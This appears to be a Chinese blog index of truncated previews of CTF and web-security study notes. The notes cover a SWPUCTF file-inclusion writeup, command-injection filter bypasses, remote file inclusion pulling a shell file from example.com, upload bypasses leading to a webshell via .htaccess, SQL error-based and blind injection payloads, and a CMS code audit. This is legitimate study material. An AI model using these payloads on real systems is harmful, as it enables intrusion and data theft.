[SWPUCTF 2018]SimplePHP 做题笔记
拿到题是一个上传文件查看文件的界面f12发现页面给了hint:flag in f1ag.php在查看文件这里有一个传参file=,疑似文件包含,用它来尝试读取源码通过读取源码重点在class.php和function.php里class.php<?phpclass C1e4r{ public $test; public $str; public function __co
命令执行学习笔记
命令注入可以通过分隔符;(前一条无论如何后一条都执行)||(前一条执行失败后一条执行) &&(前一条执行成功后一条执行)|(前一条命令的结果作为后一个命令的参数)换行符%0a,%0d``在命令里时可以内联执行过滤空格绕过:$IFS,${IFS},$IFS$9,,{cat,flag.php},$20,$09过滤关键字绕过 cat可用rev,fmt,more,base64,ta
文件包含与任意文件读取学习笔记
文件包含远程文件包含远程代码执行:?file=[http|https|ftp]://example.com/shell.txt(需要allow_url_fopen=on&&allow_url_include=on)利用php流input:?file=php://input,此时文件会获取post提交的数据(需要allow_url_include=on)本地文件包含包含同目录
php上传文件getshell学习笔记
1.前端验证绕过:burp抓包改名字2.type类型验证绕过:把content/type改成image/jpeg3.黑名单绕过:改名php3,php4,php5,phtml……4.大小写混合绕过5.文件内容绕过:6.上传.htaccess绕过将目录及子目录下所有文件按php解析php_value auto_append_file /tmp/webshell.txt文件包含php_valu
无列名注入,sqlite注入,postgresql注入学习笔记
一些绕过过滤in/or时,无法查询information_schemamysql5.7增加了sys系统数据库,payload如图过滤information_schema和sys时,可以用mysql库select table_name from mysql.innodb_table_stats where database_name=database()select table_name from
sql报错注入,文件操作,堆叠注入,宽字节注入,二次注入的学习笔记
报错注入" class="reference-link">报错注入updatexml(1,concat(0x7e,(select语句),0x7e),1)extractvalue(1,concat(0x7e,(select语句),0x7e))rand()+group()+count()/floor()一些几何函数(略)可以利用不存在函数爆数据库名8.0.x版本 uuid_to_bin((查询
sql盲注学习笔记
布尔盲注" class="reference-link">布尔盲注 布尔状态如:回显不同响应状态码不同HTTP响应头变化基于错误的布尔注入基础语句:id=1'and ascii(substr((查询语句),1,1)&gt;100)%23其中%23为#的url编码,在url中不能直接写#(浏览器会认为是片段而不是注释)ascci()的同名函数是ord()字符串的截取su
记新手上路的第一次代码审计(blueCMS v1.6 sp1)
首先下载源码在本地搭建环境访问/install目录安装时出现了问题在index.php/?act=step5的时候页面直接空白了找找代码里面问题出在哪里了![]最后有$install_smarty->display(‘step5.htm’);如果代码执行到这里页面不会是空白的,继续往上找158行判断data目录是否可写,可写入就生成一个install.lock然后发现data目录里面也没有锁